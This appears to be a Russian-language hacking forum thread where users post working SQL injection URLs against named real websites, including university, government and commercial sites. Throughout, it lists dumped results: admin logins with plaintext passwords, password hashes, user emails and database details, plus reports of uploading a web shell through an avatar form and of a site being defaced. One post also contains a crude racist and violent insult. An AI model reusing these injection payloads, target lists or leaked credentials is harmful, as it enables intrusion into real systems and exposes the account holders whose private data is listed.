Code: http://depts.washington.edu/asuwxpcl/instructors.php?id='-999999+union+select+1,concat(user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+LIMIT+1,2/* Code: http://www.hastings.edu/igsbase/igstemplate.cfm?SRC=DB&SRCN=&GnavID=1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,25,26,27,28,29+from+mysql.user+LIMIT+1,6/* Code: http://texasextension.tamu.edu/agnews/index.php?id=1+union+select+1,concat(user,password,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user+LIMIT+13,13/* мои первые
http://www.paradiz.nu/news.php?id=-1+union+select+1,2,concat(login,0x3a,password,0x3a),4+from+u57027_3.fs_admin+limit+0,10/* login: admin pass: maximus http://www.paradiz.nu/admin Зы: админка не фурычит - может обманка, или тупо не рабочая.
kubu:freedom http://microhydropower.net/user/login_page.php админка но шел залить ни как не удасцо ( и админка много не даст всё идет через mysql надеюсь на респект )
http://www.openworld.gov/ PR - 6 http://www.openworld.gov/news/print.php?id=215&lang=2 - Путь к уязвимому скрипту Первых 5 записей форума [1]:anonymous: [2]:bbadmin:93dc6603a409188be197bde54e543056 [3]:A.Natasha:084301fc1b042b1397edb06d1a7c9125 [4]:Âîëêîâ Àëåêñåé:3d863b367aa379f71c7afc0c9cdca41d [5]:Olga Gornovaya:a122c630d4ac882086a70604dfd43c9e Первых 5 записей системных юзеров [1]:vadim:046d0f41a5d82dc559978d127488f339:[email protected] [2]lga:df5ee863b0a8ed6114bed2afa3440a9d[email protected] [3]:boukel:1fe1985be591afb061dee0857b6a4f47:[email protected] [4]:mbuhar:e89c7fb2900fec2c35d3a056160cbe80:[email protected] [5]:Britta:a15bb2bcc715bbd968f5bae3efae67c4:[email protected]
Code: http://www.german-tigers.de/Quiz/phptest-0.6.3/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/* Code: admin::07428b233f457aa2 Code: inurl:"powered by phptest 0.6.3" Code: http://www.et2d.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/* Code: 15aa7b432c7f74b11c332b8d60672cc4:Muhammad Code: inurl:"powered by Live Music Plus"
http://www.justinian.com.ua/album.php?cat=2+union+select+concat_ws(0x3a,ID,Login,Passw),2,3,4,5,6+from+authUser/* Админка: www.justinian.com.ua/admin Login: ups Password: alladin помимо скулей и xss,есть баг с zend engine hashes,а так же раскрытие путей,имён таблиц с колонками и т.д. и т.п... Баг на баге).У кого получится залить шелл пишите xDDD. http://www.soaw.org/pressrelease.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13+from+phpsp_users-- Таблицы - account, phpsp_users http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+1,1-- Table: xoops_users Virgo-vlad:46f227e9cf17e2e1e88b14e679047bd9:252525 andron_AS:123e24289c7434008bec6b61ab8f100a:looper Barulya:7a4ff1d33e92f1b8e33b8bbb6daf08c6:kos1981 Belle:e76d56e405d994722ac98d9966146010:ghjcnjnfr Bolt:ba3a02ac8d369c6747c0007368b98500:fkut,hf chirik:f6c5fe9e207a16fb771e2231a9f30851:231276 crazyman:3e0e92b5dd80c25494d58cac262193fd Table: user S Maxim S:4e3acf83f4228b1ca16b7579baa82156 Segoktuhf:0be8ec195a5680fc5fb23848a18e63ba Pindukled:1a840b31bd4fdf0d7ebfd7188474e997 ruslibrary:e60d4769b08ffc474fa7e53b995b8e4d Table: ibf_members automart:0fd4124daf45355c946a2d040ca286e2 password: dallas22 Tolstiy:b3b4d2dbedc99fe843fd3dedb02f086f password: 1981 chirik:f6c5fe9e207a16fb771e2231a9f30851 password: 231276 sergsava: qwert
http://www.mylover.ru/?mode=rating&rating_id=1&pid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(login,0x3a,pswd,0x3a,type),14,15,16,17,18,19,20,21,22,23,24,25,26+from+mylover_data.members+limit+20,29/*&mark=4 superkrasa::tufundenda Есть phpmyadmin, но аутентификация не через бд.
бажный скрипт_1: Code: http://webmuseum.mit.edu/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* бажный скрипт_2: Code: http://webmuseum.mit.edu/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* 1:[email protected]:6416d795663220752ae6f7edc19c87bd:Y )
smart.ru Code: http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'%20AND%201=@@version-- Code: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) таблы Code: http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('')))-- xaction Дальше Code: http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction')))-- syssegments Патом Code: http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction','syssegments')))-- sysconstraints Ну чё я рассказываю, кому надо, поймут
РусьЕдиная.ру Code: http://russedina.ru/frontend/heading/economy?id=-999999+union+select+concat(name,0x3a,password),2,3+from+users/* uralsJK3:uralsJKL
Агенство бизнес новостей // ТИЦ=2600 PR=6 Code: http://www.abnews.ru/index.php?p=sudi_pravo_i_armiya&news=-999999999+union+select+1,2,3,4/* Queen and Paul Rodgers - Homepage // ТИЦ=30 PR=5 Code: http://www.queenpluspaulrodgers.com/index.php?news_id=-999999999+union+select+1,2,3,4,5,6,7,8/* Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5 Code: http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* ОАО «Стеклозавод «НЕМАН» // ТИЦ=110 PR=3 Code: http://www.neman.by/ru/index.php?news_id=-999999999+union+select+1/*
http://www.dunloptyres.ru/tyre.php?id=-1+union+select+1,unhex(hex(concat(login,0x3a,password)))+from+partners+limit+1,1/*,:yes: Login: DUN-OPT Pass: 24DUN76df Открытый пас, бесполезный сайт.
_http://www.hlbs.co.uk/type.php?id=19+union+select+1,2,3,4/* _http://www.tgfs.com.au/type.php?no=2+union+select+1,2,3,4,5,6,7/* _http://www.recipe.ru/docs/nd/type.php?id=3+union+select+1,2,3,4,5,6,7,8/* _http://www.danaeco.ru/addinfo/catalog/type.php?id=-9+union+select+1,2,3,4,5,6,7,8/* _http://www.burgessbeds.co.uk/product/type.php?id=-7+union+select+1,2,user(),4,5,6,7,8/* version() - 4.0.30-log user() - [email protected] database() - u10042967 _http://alumni.yale.edu/aya/blueprint/type.php?id=-3+union+select+1,2,3,4,5,user()/* version() - 4.1.20 user() - bp2005@localhost database() - bpdb2
http://www.sibgastroli.ru/?content=shownews&id=-1+union+select+1,2,3,4,concat(psw,0x3a,user),name,7,8,9,10,11,12+from+forum_users+limit+0,10/* login: alone_hunter password: bear Выборка по юзерам форума. Зы: Таких программистов нужно е**ть в сраку =)(Отдавать неграм на растерзание) Через upload аватара закачивается все что угодно душе =) Наш выбор madshell.php =) http://sibgastroli.ru/_images/users/alone_hunter.php Можно покопаться в корне freebsd'шки агавовского хостинга =)
Забыл: 842637 это пас админа, superadmin! это его же логин. http://sibgastroli.ru/admin - соответственно админка.
Code: http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/* TABLES: aqualung:e05cbba9cd092521901a26346a0e5f3f то есть можно залить шелл через админку если хэш крякнуть ------ Есть админка: таблица user: root:zakryto_cossa kot:kot Я как рут увидал сразу понял куда впихать этот пасс _http://www.rsava.org/admin/ ------ Турецкий хекер уже задефейсил(то есть через день,вот падальщики )))
fat-cat.co.uk Code: http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,password,email),3,4,5,6,7+FROM+users%20where%20id=2/* Таблица users: Code: 2iwantiwantiwantSeiji25x[email protected] 3alex_teagundam[email protected] ...................................................................... ...................................................................... 1442chuppethxq92EAA932[email protected] 1443FemyanaehoowngIPouCm641[email protected] хеш текушева пользователя mysql.user и вывод file_priv Code: http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,password),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/ file_priv нет Code: Nfatcat*B4DE6388421C75A631A6BADDCC27DAEE58D0122A sublackwell.co.uk Code: http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5-- Mysql 5 версии таблиц интересных не нашел (
http://moldagrotehnica.md user() = agro@localhost version() = 4.1.14 database() = moldagrotehnica_md http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,4/**/from/**/glt_voting_result/**/limit/**/1,1/* http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,count(*)/**/from/**/glt_users/**/limit/**/0,1/* count(*) from glt_users = 5 узнал названия и префикс таблиц когда отправил данные в vote.php Query INSERT INTO `glt_voting_result` failed админка на первой странице .. но не смог подобрать поля в базе
Code: http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- user - pioneer_mainU@localhost database - 5.0.51a- version - pioneer_main =\